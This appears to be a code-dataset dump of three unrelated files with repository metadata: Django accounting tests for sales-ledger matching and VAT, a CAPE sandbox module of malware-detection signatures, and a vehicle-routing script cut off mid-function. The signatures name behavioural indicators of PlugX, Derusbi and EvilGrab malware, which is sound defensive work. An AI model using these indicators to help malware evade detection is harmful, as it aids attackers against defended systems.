self.assertEqual(
matches[0].value,
-100
)
self.assertEqual(
matches[1].matched_by,
headers[0]
)
self.assertEqual(
matches[1].matched_to,
headers[2]
)
self.assertEqual(
matches[1].value,
100
)
header = headers[0]
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": header.type,
"customer": header.customer.pk,
"period": header.period.pk,
"ref": header.ref,
"date": header.date.strftime(DATE_INPUT_FORMAT),
"due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
"total": 2400
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': 100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}
] * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(line_data)
# WE HAVE TO MATCH OTHERWISE IT WILL ERROR
headers_to_match_against_orig = headers_to_match_against
headers_as_dicts = [ to_dict(header) for header in headers_to_match_against ]
headers_to_match_against = [ get_fields(header, ['type', 'ref', 'total', 'paid', 'due', 'id']) for header in headers_as_dicts ]
matching_forms = []
matching_forms += add_and_replace_objects([headers_to_match_against[0]], {"id": "matched_to"}, {"value": 100})
matching_forms += add_and_replace_objects([headers_to_match_against[1]], {"id": "matched_to"}, {"value": -100})
matching_forms[0]["id"] = matches[0].pk
matching_forms[1]["id"] = matches[1].pk
matching_data = create_formset_data(match_form_prefix, matching_forms)
matching_data["match-INITIAL_FORMS"] = 2
data.update(matching_data)
url = reverse("sales:edit", kwargs={"pk": header.pk})
response = self.client.post(url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(
len(headers),
3
)
self.assertEqual(
headers[0].total,
-2400
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2400
)
self.assertEqual(
headers[1].total,
-100
)
self.assertEqual(
headers[1].paid,
-100
)
self.assertEqual(
headers[1].due,
0
)
self.assertEqual(
headers[2].total,
100
)
self.assertEqual(
headers[2].paid,
100
)
self.assertEqual(
headers[2].due,
0
)
header = headers[0]
lines = (
SaleLine.objects
.select_related("vat_code")
.all()
.order_by("pk")
)
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
vat_transactions = list(vat_transactions)
lines = list(lines)
nom_trans = NominalTransaction.objects.all().order_by("pk")
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
for i, line in enumerate(lines):
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.header, header)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for i, tran in enumerate(goods_nom_trans):
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
for i, tran in enumerate(vat_nom_trans):
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
for i, tran in enumerate(total_nom_trans):
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
self.assertEqual(
lines[i].total_nominal_transaction,
tran
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
2
)
self.assertEqual(
matches[0].matched_by,
headers[0]
)
self.assertEqual(
matches[0].matched_to,
headers[1]
)
self.assertEqual(
matches[0].value,
-100
)
self.assertEqual(
matches[1].matched_by,
headers[0]
)
self.assertEqual(
matches[1].matched_to,
headers[2]
)
self.assertEqual(
matches[1].value,
100
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# INCORRECT USAGE
def test_new_matched_value_is_ok_for_transaction_being_edited_but_not_for_matched_transaction_1(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 120.01
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': 100.01,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}
]
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
response = self.client.post(reverse("sales:create"), data)
self.assertEqual(
response.status_code,
302
)
# Credit Note for 120.00
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "si",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 120.00
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': 100.00,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}
]
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
response = self.client.post(reverse("sales:create"), data)
self.assertEqual(
response.status_code,
302
)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(
len(headers),
2
)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": -0.01
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': -0.01,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 0
}
]
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(line_data)
matching_forms = []
matching_forms.append({
"type": headers[0].type,
"ref": headers[0].ref,
"total": headers[0].total * -1,
"paid": headers[0].paid * -1,
"due": headers[0].due * -1,
"matched_by": '',
"matched_to": headers[0].pk,
"value": headers[0].total * -1,
})
matching_forms.append({
"type": headers[1].type,
"ref": headers[1].ref,
"total": headers[1].total,
"paid": headers[1].paid,
"due": headers[1].due,
"matched_by": '',
"matched_to": headers[1].pk,
"value": headers[1].total,
})
matching_data = create_formset_data(match_form_prefix, matching_forms)
data.update(matching_data)
response = self.client.post(reverse("sales:create"), data)
self.assertEqual(
response.status_code,
302
)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(
len(headers),
3
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
2
)
self.assertEqual(
matches[0].matched_by,
headers[2]
)
self.assertEqual(
matches[0].matched_to,
headers[0]
)
self.assertEqual(
matches[0].value,
two_dp(-120.01)
)
self.assertEqual(
matches[1].matched_by,
headers[2]
)
self.assertEqual(
matches[1].matched_to,
headers[1]
)
self.assertEqual(
matches[1].value,
120
)
# Now for the edit. In the UI the match value shows as -120.01. In the DB it shows as 120.01
# We want to change the value to 110.01. This isn't ok because the -0.01 invoice can only be
# matched for 0 and full value. The edit will mean the matched will be outside this.
lines = SaleLine.objects.filter(header=headers[0]).all()
self.assertEqual(
len(lines),
1
)
# Invoice for 120.01
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 120.01
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': 100.01,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}
]
line_forms[0]["id"] = lines[0].pk
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
line_data["line-INITIAL_FORMS"] = 1
data.update(line_data)
matching_forms = []
matching_forms.append({
"type": headers[2].type,
"ref": headers[2].ref,
"total": headers[2].total * -1,
"paid": headers[2].paid * -1,
"due": headers[2].due * -1,
"matched_by": headers[2].pk,
"matched_to": headers[0].pk,
"value": '-110.01',
"id": matches[0].pk
})
matching_data = create_formset_data(match_form_prefix, matching_forms)
matching_data["match-INITIAL_FORMS"] = 1
data.update(matching_data)
response = self.client.post(reverse("sales:edit", kwargs={"pk": headers[0].pk}), data)
self.assertEqual(
response.status_code,
200
)
# INCORRECT USAGE
def test_new_matched_value_is_ok_for_transaction_being_edited_but_not_for_matched_transaction_2(self):
self.client.force_login(self.user)
# Create an invoice for 120.01 through view first
# Second create a credit note for 120.00
# Third create an invoice for -0.01 and match the other two to it
# Invalid edit follows
# Invoice for 120.01
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 120.01
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': 100.01,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}
]
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
response = self.client.post(reverse("sales:create"), data)
self.assertEqual(
response.status_code,
302
)
# Credit Note for 120.00
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "si",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 120.00
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': 100.00,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}
]
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
response = self.client.post(reverse("sales:create"), data)
self.assertEqual(
response.status_code,
302
)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(
len(headers),
2
)
# Invoice for -0.01
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": -0.01
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': -0.01,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 0
}
]
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(line_data)
matching_forms = []
matching_forms.append({
"type": headers[0].type,
"ref": headers[0].ref,
"total": headers[0].total * -1,
"paid": headers[0].paid * -1,
"due": headers[0].due * -1,
"matched_by": '',
"matched_to": headers[0].pk,
"value": headers[0].total * -1,
})
matching_forms.append({
"type": headers[1].type,
"ref": headers[1].ref,
"total": headers[1].total,
"paid": headers[1].paid,
"due": headers[1].due,
"matched_by": '',
"matched_to": headers[1].pk,
"value": headers[1].total,
})
matching_data = create_formset_data(match_form_prefix, matching_forms)
data.update(matching_data)
response = self.client.post(reverse("sales:create"), data)
self.assertEqual(
response.status_code,
302
)
headers = SaleHeader.objects.all().order_by("pk")
self.assertEqual(
len(headers),
3
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
2
)
self.assertEqual(
matches[0].matched_by,
headers[2]
)
self.assertEqual(
matches[0].matched_to,
headers[0]
)
self.assertEqual(
matches[0].value,
two_dp(-120.01)
)
self.assertEqual(
matches[1].matched_by,
headers[2]
)
self.assertEqual(
matches[1].matched_to,
headers[1]
)
self.assertEqual(
matches[1].value,
120
)
# Now for the edit. In the UI the match value shows as -120.01. In the DB it shows as 120.01
# We want to change the value to 110.01. This isn't ok because the -0.01 invoice can only be
# matched for 0 and full value. The edit will mean the matched will be outside this.
lines = SaleLine.objects.filter(header=headers[0]).all()
self.assertEqual(
len(lines),
1
)
# Invoice for 120.01
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 120.01
}
)
data.update(header_data)
line_forms = [
{
'description': self.description,
'goods': 100.01,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}
]
line_forms[0]["id"] = lines[0].pk
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
line_data["line-INITIAL_FORMS"] = 1
data.update(line_data)
matching_forms = []
matching_forms.append({
"type": headers[2].type,
"ref": headers[2].ref,
"total": headers[2].total * -1,
"paid": headers[2].paid * -1,
"due": headers[2].due * -1,
"matched_by": headers[2].pk,
"matched_to": headers[0].pk,
"value": '-120.02',
"id": matches[0].pk
})
matching_data = create_formset_data(match_form_prefix, matching_forms)
matching_data["match-INITIAL_FORMS"] = 1
data.update(matching_data)
response = self.client.post(reverse("sales:edit", kwargs={"pk": headers[0].pk}), data)
self.assertEqual(
response.status_code,
200
)
# INCORRECT USAGE
# Add another line this time
def test_new_line_marked_as_deleted_does_not_count(self):
self.client.force_login(self.user)
create_credit_note_with_nom_entries(
{
"type": "sc",
"customer": self.customer,
"period": self.period,
"ref": self.ref,
"date": self.model_date,
"due_date": self.model_due_date,
"total": 2400,
"paid": 0,
"due": 2400,
"goods": 2000,
"vat": 400
},
[
{
'description': self.description,
'goods': 100,
'nominal': self.nominal,
'vat_code': self.vat_code,
'vat': 20
}
] * 20,
self.vat_nominal,
self.sale_control
)
headers = SaleHeader.objects.all().order_by("pk")
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
create_vat_transactions(headers[0], lines)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
self.assertEqual(
len(headers),
1
)
self.assertEqual(
headers[0].total,
-2400
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2400
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
header = headers[0]
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
for i, line in enumerate(lines):
self.assertEqual(line.header, header)
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for i, tran in enumerate(goods_nom_trans):
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
self.assertEqual(
lines[i].goods_nominal_transaction,
tran
)
for i, tran in enumerate(vat_nom_trans):
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
self.assertEqual(
lines[i].vat_nominal_transaction,
tran
)
for i, tran in enumerate(total_nom_trans):
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
self.assertEqual(
lines[i].total_nominal_transaction,
tran
)
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": header.type,
"customer": header.customer.pk,
"period": header.period.pk,
"ref": header.ref,
"date": header.date.strftime(DATE_INPUT_FORMAT),
"due_date": header.due_date.strftime(DATE_INPUT_FORMAT),
"total": header.total * -1
}
)
data.update(header_data)
lines_as_dicts = [ to_dict(line) for line in lines ]
line_trans = [ get_fields(line, ['id', 'description', 'goods', 'nominal', 'vat_code', 'vat']) for line in lines_as_dicts ]
line_forms = line_trans
last_line_form = line_forms[-1].copy()
last_line_form["id"] = ""
last_line_form["DELETE"] = "YEP"
for form in line_forms:
form["goods"] *= -1
form["vat"] *= -1
line_forms.append(last_line_form)
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
line_data["line-INITIAL_FORMS"] = 20
data.update(line_data)
matching_data = create_formset_data(match_form_prefix, [])
data.update(matching_data)
url = reverse("sales:edit", kwargs={"pk": headers[0].pk})
response = self.client.post(url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
self.assertEqual(
headers[0].total,
-2400
)
self.assertEqual(
headers[0].paid,
0
)
self.assertEqual(
headers[0].due,
-2400
)
nom_trans = NominalTransaction.objects.all()
nom_trans = sort_multiple(nom_trans, *[ (lambda n : n.pk, False) ])
self.assertEqual(
len(nom_trans),
20 + 20 + 20
)
header = headers[0]
lines = (
SaleLine.objects
.select_related("vat_code")
.all()
.order_by("pk")
)
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
vat_transactions = list(vat_transactions)
lines = list(lines)
for i, line in enumerate(lines):
self.assertEqual(line.header, header)
self.assertEqual(line.line_no, i + 1)
self.assertEqual(line.description, self.description)
self.assertEqual(line.goods, -100)
self.assertEqual(line.nominal, self.nominal)
self.assertEqual(line.vat_code, self.vat_code)
self.assertEqual(line.vat, -20)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[ 3 * i ]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[ (3 * i) + 1 ]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[ (3 * i) + 2 ]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_nom_trans = nom_trans[::3]
vat_nom_trans = nom_trans[1::3]
total_nom_trans = nom_trans[2::3]
for tran in goods_nom_trans:
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.field,
"g"
)
for tran in vat_nom_trans:
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.field,
"v"
)
for tran in total_nom_trans:
self.assertEqual(
tran.value,
-120
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.field,
"t"
)
# NOW CHECK THE EDITED
matches = SaleMatching.objects.all()
self.assertEqual(
len(matches),
0
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
| [
"rossm6@googlemail.com"
] | rossm6@googlemail.com |
ee784fcf452c66c9190b9ade1e753cfa0f306994 | ada3899b0d2332121087105ceeba0b138681ecf2 | /modules/signatures/CAPE.py | 2642b2b5625d195eed0e7ad9e39bd475e10a6e4e | [] | no_license | olivierh59500/CAPE | 51d6a4e8b022b660ad8f64860459186f1d308987 | 823f78d22f444ee6db93e7b02c9fa77e64186baa | refs/heads/master | 2021-01-12T01:12:26.614946 | 2016-12-31T23:35:23 | 2016-12-31T23:35:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,171 | py | from lib.cuckoo.common.abstracts import Signature
EXTRACTION_MIN_SIZE = 0x2000
class CAPE_PlugX(Signature):
name = "CAPE PlugX"
description = "CAPE detection: PlugX"
severity = 3
categories = ["chinese", "malware"]
families = ["plugx"]
authors = ["kev"]
minimum = "1.3"
evented = True
filter_apinames = set(["RtlDecompressBuffer", "memcpy"])
def __init__(self, *args, **kwargs):
Signature.__init__(self, *args, **kwargs)
self.compressed_binary = False
self.config_copy = False
self.plugx = False
def on_call(self, call, process):
if call["api"] == "RtlDecompressBuffer":
buf = self.get_argument(call, "UncompressedBuffer")
if "XV" in buf:
self.compressed_binary = True
if "MZ" in buf:
self.compressed_binary = True
if call["api"] == "memcpy":
count = self.get_raw_argument(call, "count")
if (count == 0xae4) or \
(count == 0xbe4) or \
(count == 0x150c) or \
(count == 0x1510) or \
(count == 0x1516) or \
(count == 0x170c) or \
(count == 0x1b18) or \
(count == 0x1d18) or \
(count == 0x2540) or \
(count == 0x254c) or \
(count == 0x2d58) or \
(count == 0x36a4) or \
(count == 0x4ea4):
self.config_copy = True
def on_complete(self):
if self.config_copy == True and self.compressed_binary == True:
self.plugx = True
return True
class CAPE_PlugX_fuzzy(Signature):
name = "CAPE PlugX fuzzy"
description = "CAPE detection: PlugX (fuzzy match)"
severity = 3
categories = ["chinese", "malware"]
families = ["plugx"]
authors = ["kev"]
minimum = "1.3"
evented = True
filter_apinames = set(["RtlDecompressBuffer", "memcpy"])
def __init__(self, *args, **kwargs):
Signature.__init__(self, *args, **kwargs)
self.compressed_binary = False
self.config_copy = False
self.plugx = False
def on_call(self, call, process):
if call["api"] == "RtlDecompressBuffer":
buf = self.get_argument(call, "UncompressedBuffer")
if "XV" in buf:
self.plugx = True
if "MZ" in buf:
self.compressed_binary = True
def on_complete(self):
if self.config_copy == True and self.compressed_binary == True:
self.plugx = True
if self.plugx == True:
return True
class CAPE_Compression(Signature):
name = "CAPE Compression"
description = "CAPE detection: Compression"
severity = 3
categories = ["malware"]
authors = ["kev"]
minimum = "1.3"
evented = True
filter_apinames = set(["RtlDecompressBuffer"])
def __init__(self, *args, **kwargs):
Signature.__init__(self, *args, **kwargs)
self.compressed_binary = False
def on_call(self, call, process):
if call["api"] == "RtlDecompressBuffer":
buf = self.get_argument(call, "UncompressedBuffer")
if "MZ" in buf:
self.compressed_binary = True
def on_complete(self):
if self.compressed_binary == True:
return True
class CAPE_Derusbi(Signature):
name = "CAPE Derusbi"
description = "CAPE detection: Derusbi"
severity = 3
categories = ["chinese", "malware"]
families = ["derusbi"]
authors = ["kev"]
minimum = "1.3"
evented = True
filter_apinames = set(["srand", "memcpy"])
def __init__(self, *args, **kwargs):
Signature.__init__(self, *args, **kwargs)
self.srand = False
self.config_copy = False
self.derusbi = False
def on_call(self, call, process):
if call["api"] == "srand":
self.srand = True
if call["api"] == "memcpy":
count = self.get_raw_argument(call, "count")
if (count == 0x50) or \
(count == 0x1A8) or \
(count == 0x2B4):
self.config_copy = True
def on_complete(self):
if self.config_copy == True and self.srand == True:
self.derusbi = True
#return True
return False
class CAPE_EvilGrab(Signature):
name = "CAPE EvilGrab"
description = "CAPE detection: EvilGrab"
severity = 3
categories = ["malware"]
authors = ["kev"]
minimum = "1.3"
evented = True
filter_apinames = set(["RegSetValueExA", "RegSetValueExW", "RegCreateKeyExA", "RegCreateKeyExW"])
def __init__(self, *args, **kwargs):
Signature.__init__(self, *args, **kwargs)
self.reg_evilgrab_keyname = False
self.reg_binary = False
def on_call(self, call, process):
if call["api"] == "RegCreateKeyExA" or call["api"] == "RegCreateKeyExW":
buf = self.get_argument(call, "SubKey")
if buf == "Software\\rar":
self.reg_evilgrab_keyname = True
if call["api"] == "RegSetValueExA" or call["api"] == "RegSetValueExW":
length = self.get_raw_argument(call, "BufferLength")
if length > 0x10000 and self.reg_evilgrab_keyname == True:
self.reg_binary = True
def on_complete(self):
if self.reg_binary == True:
return True
else:
return False
class ExtractionRWX(Signature):
name = "extraction_rwx"
description = "CAPE detection: Extraction"
severity = 1
categories = ["allocation"]
authors = ["Context"]
minimum = "1.2"
evented = True
def __init__(self, *args, **kwargs):
Signature.__init__(self, *args, **kwargs)
filter_apinames = set(["NtAllocateVirtualMemory","NtProtectVirtualMemory","VirtualProtectEx"])
# PAGE_EXECUTE_READWRITE = 0x00000040
def on_call(self, call, process):
if call["api"] == "NtAllocateVirtualMemory":
protection = self.get_argument(call, "Protection")
regionsize = int(self.get_raw_argument(call, "RegionSize"), 0)
handle = self.get_argument(call, "ProcessHandle")
if handle == "0xffffffff" and protection == "0x00000040" and regionsize >= EXTRACTION_MIN_SIZE:
return True
if call["api"] == "VirtualProtectEx":
protection = self.get_argument(call, "Protection")
size = int(self.get_raw_argument(call, "Size"), 0)
handle = self.get_argument(call, "ProcessHandle")
if handle == "0xffffffff" and protection == "0x00000040" and size >= EXTRACTION_MIN_SIZE:
return True
elif call["api"] == "NtProtectVirtualMemory":
protection = self.get_argument(call, "NewAccessProtection")
size = int(self.get_raw_argument(call, "NumberOfBytesProtected"), 0)
handle = self.get_argument(call, "ProcessHandle")
if handle == "0xffffffff" and protection == "0x00000040" and size >= EXTRACTION_MIN_SIZE:
return True
| [
"kevoreilly@gmail.com"
] | kevoreilly@gmail.com |
3b7e31598de80dadbe58eefb86f5b22d9de2754d | 0c25196fc490ab8394a8e578f50bfd07670a54d0 | /partition/lib/ortool/vrp.py | 3119b4f6d9e8f1d5dd04df839a0c3297235433e6 | [] | no_license | xiaogaogaoxiao/MinMax-MTSP | 42b73f9a64ce9731e387dabc0f77e721571488ec | ae05e3d6666e01e15ecdfeb8bd1e2f2a5b8770ff | refs/heads/master | 2022-11-22T22:46:01.111180 | 2020-07-22T06:40:03 | 2020-07-22T06:40:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,285 | py | """Vehicles Routing Problem (VRP)."""
from __future__ import print_function
from ortools.constraint_solver import routing_enums_pb2
from ortools.constraint_solver import pywrapcp
import torch
import multiprocessing
import time
import numpy as np
C = 100000
const_process_num = 26
def Euclidean_distance(coords):
city_square = torch.sum(coords ** 2, dim=1, keepdim=True)
city_square_tran = torch.transpose(city_square, 1, 0)
cross = -2 * torch.matmul(coords, torch.transpose(coords, 1, 0))
dist = city_square + city_square_tran + cross
dist = torch.sqrt(dist)
for m in range(dist.size(0)):
dist[m, m] = 0.0
dist = dist * C
return dist.long().numpy()
def create_data_model(coords, anum):
"""Stores the data for the problem."""
data = {}
data['num_vehicles'] = anum
data['depot'] = 0
data['distance_matrix'] = []
dist = Euclidean_distance(coords)
cnum = coords.size(0)
for c in range(cnum):
data['distance_matrix'].append(list(dist[c]))
return data
def print_solution(data, manager, routing, solution):
anum = data['num_vehicles']
tourlen = torch.zeros(anum)
"""Prints solution on console."""
# max_route_distance = 0
tours = []
for vehicle_id in range(data['num_vehicles']):
atour = []
index = routing.Start(vehicle_id)
plan_output = 'Route for vehicle {}:\n'.format(vehicle_id)
route_distance = 0
while not routing.IsEnd(index):
atour.append(manager.IndexToNode(index))
plan_output += ' {} -> '.format(manager.IndexToNode(index))
previous_index = index
index = solution.Value(routing.NextVar(index))
route_distance += routing.GetArcCostForVehicle(
previous_index, index, vehicle_id)
atour.append(manager.IndexToNode(index))
plan_output += '{}\n'.format(manager.IndexToNode(index))
plan_output += 'Distance of the route: {}m\n'.format(route_distance/C)
tourlen[vehicle_id] = route_distance/C
tours.append(atour)
# print(plan_output)
# max_route_distance = max(route_distance, max_route_distance)
# print('Maximum of the route distances: {}m'.format(max_route_distance/100000))
return tourlen, tours
def solve_instance_vrp(inputs):
"""Solve the CVRP problem."""
# Instantiate the data problem.
coords = inputs[0]
anum = inputs[1]
if len(inputs) > 2:
